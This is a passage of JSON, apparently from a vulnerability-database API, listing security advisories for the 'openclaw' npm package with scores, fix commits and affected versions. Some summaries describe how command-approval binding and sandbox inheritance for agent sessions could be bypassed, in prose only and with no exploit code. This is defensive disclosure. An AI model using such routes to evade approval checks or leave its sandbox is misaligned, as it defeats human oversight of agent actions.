`2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc"},{"reference_url":"https://github.com/advisories/GHSA-7jm2-g593-4qrc","reference_id":"GHSA-7jm2-g593-4qrc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jm2-g593-4qrc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-7jm2-g593-4qrc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7akj-469t-57hz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90184?format=json","vulnerability_id":"VCID-7dyw-9b37-yqh4","summary":"OpenClaw: Zalo webhook replay cache cross-target messageId scope bypass\n## Summary\nZalo webhook replay cache cross-target messageId scope bypass\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 replay dedupe is still keyed too broadly, but the issue should stay scoped to authenticated sibling-target delivery paths rather than arbitrary unauthenticated attackers.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — 2026-03-31T19:33:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41402","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11323","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11356","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11364","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41402"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41402","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41402"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass"},{"reference_url":"https://github.com/advisories/GHSA-hhq4-97c2-p447","reference_id":"GHSA-hhq4-97c2-p447","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hhq4-97c2-p447"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41402","GHSA-hhq4-97c2-p447"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7dyw-9b37-yqh4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91391?format=json","vulnerability_id":"VCID-7gju-19nh-7bgu","summary":"Duplicate Advisory: OpenClaw's inbound media downloads could exceed configured byte limits before rejection across multiple channels\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-rxxp-482v-7mrh. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 fail to consistently enforce configured inbound media byte limits before buffering remote media across multiple channel ingestion paths. Remote attackers can send oversized media payloads to trigger elevated memory usage and potential process instability.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/73d93dee64127a26f1acd09d0403b794cdeb4f5c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/73d93dee64127a26f1acd09d0403b794cdeb4f5c"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-inbound-media-download-byte-limit-bypass","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-inbound-media-download-byte-limit-bypass"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32049","reference_id":"CVE-2026-32049","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32049"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxxp-482v-7mrh","reference_id":"GHSA-rxxp-482v-7mrh","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxxp-482v-7mrh"},{"reference_url":"https://github.com/advisories/GHSA-xq3g-m3j8-2vmm","reference_id":"GHSA-xq3g-m3j8-2vmm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xq3g-m3j8-2vmm"}],"fixed_packages":[],"aliases":["GHSA-xq3g-m3j8-2vmm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7gju-19nh-7bgu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89799?format=json","vulnerability_id":"VCID-7ntr-5dr5-9uf8","summary":"OpenClaw: Windows-compatible env override keys could bypass system.run approval binding\n## Summary\n\nBefore OpenClaw 2026.4.2, system-run approval binding normalized environment override keys differently from host execution. Windows-compatible keys could be omitted from the approval binding while still being injected at execution time.\n\n## Impact\n\nAn approved command could run with attacker-chosen environment overrides that were not represented in the approval binding. This created an approval-integrity gap for affected host-exec flows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d` — align approval binding with execution-time env-key normalization\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47"},{"reference_url":"https://github.com/advisories/GHSA-98ch-45wp-ch47","reference_id":"GHSA-98ch-45wp-ch47","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-98ch-45wp-ch47"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-98ch-45wp-ch47"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7ntr-5dr5-9uf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50534?format=json","vulnerability_id":"VCID-7pqs-17nm-duf1","summary":"OpenClaw: Sandboxed sessions_spawn(runtime=\"acp\") bypassed sandbox inheritance and allowed host ACP initialization\nSandboxed `sessions_spawn(runtime=\"acp\")` could bypass sandbox inheritance and initialize host-side ACP runtime. The fix now fail-closes ACP spawn from sandboxed requester sessions and rejects `sandbox=\"require\"` for `runtime=\"acp\"`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ac11f0af731d41743ba02d8595f4d0fe747336e3","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ac11f0af731d41743ba02d8595f4d0fe747336e3"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c703aa0fe92df9fb71cf254fc46991e05fba2114","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c703aa0fe92df9fb71cf254fc46991e05fba2114"},{"reference_url":"https://github.com/advisories/GHSA-474h-prjg-mmw3","reference_id":"GHSA-474h-prjg-mmw3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-474h-prjg-mmw3"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-474h-prjg-mmw3","reference_id":"GHSA-474h-prjg-mmw3","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scorin